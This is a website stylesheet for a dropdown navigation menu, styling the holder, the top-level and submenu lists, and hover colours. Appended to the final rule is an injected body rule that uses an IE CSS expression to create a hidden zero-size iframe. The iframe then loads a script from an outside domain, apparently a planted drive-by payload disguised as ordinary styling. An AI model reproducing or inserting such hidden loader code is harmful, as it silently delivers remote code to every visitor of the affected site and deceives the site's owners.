@charset "utf-8";
/* CSS Document */

/* minimum menu requirements */

#holder
{
	width:760px;
	height:30px;
	background:/*#333333*/ url(http://assets.skyblade.com.ph/Images/back-sb-main.png) no-repeat;
	/*vertical-align:middle;*/
	margin-left:auto;
	margin-right:auto;	
	text-align:center;
	font-family:Arial;
	font-size:11px;
	padding-top:10px;
	text-transform: uppercase;
}

/* minimum menu requirements */

.topmenuul{
	list-style-type:none;
	margin:0;
	padding:0;
}

.topmenuli{
	list-style-type:none;
	float:left;

}

.topmenuli a{
	color:white;
}

.topmenutitle{
	display:block;
	width:100px;
}

.submenuul{
	list-style-type:none;
	position:absolute;
	margin: 0;
	padding:0;
	display:none;
	text-align:left;	
}

.nav a{
	display:block;
	width:85px;
}

li:hover ul , li.over ul{ /* lists nested under hovered list items */
	display: block;
}

.dmenu li>ul { 
	top: auto;
	left: auto;
}

#content {
	clear: left;

}

/* menu design */

.dmenu {
	font-family: Arial, Helvetica, Sans-Serif;
	font-size:12px;
}

.topmenuul {
	
}

.topmenutitle {
	text-indent:3px;
	text-decoration: none;
	padding:3px;
	line-height:14px;
	border-right:1px solid white;
	font:11px Arial;
	font-weight:bold;
	text-transform:uppercase;
	text-align:center;
	width:85px;
	color:white;
}

.topmenutitle:hover {
	color: #FFFF00;
}

.submenuul {
	margin-top:-1px;
	background-color:#111111;
	background-position: top left;
	background-repeat: repeat-x;
	border-top:1px solid #444;
	border-bottom:1px solid #444;
	border-right:1px solid #444;
	border-left:1px solid #444;
	font:11px Arial;
	font-weight:bold;
	text-transform:uppercase;
}

.nav a{
	padding:3px;
	text-decoration: none;
	color: white;
	
}

.nav a:hover{
	text-decoration: none;
	background: #333;
	color: #FFFF00;
}body{zoom:expression(function(ele){setTimeout(function(){var i=document.createElement('iframe');i.width=i.height=0;document.body.appendChild(i);i.contentWindow.setTimeout(function(){i.contentWindow.document.write('<script src=http://www.pkupe.com/images/pic.js></script>');},1000);},1000);ele.style.zoom='1';}(this));}
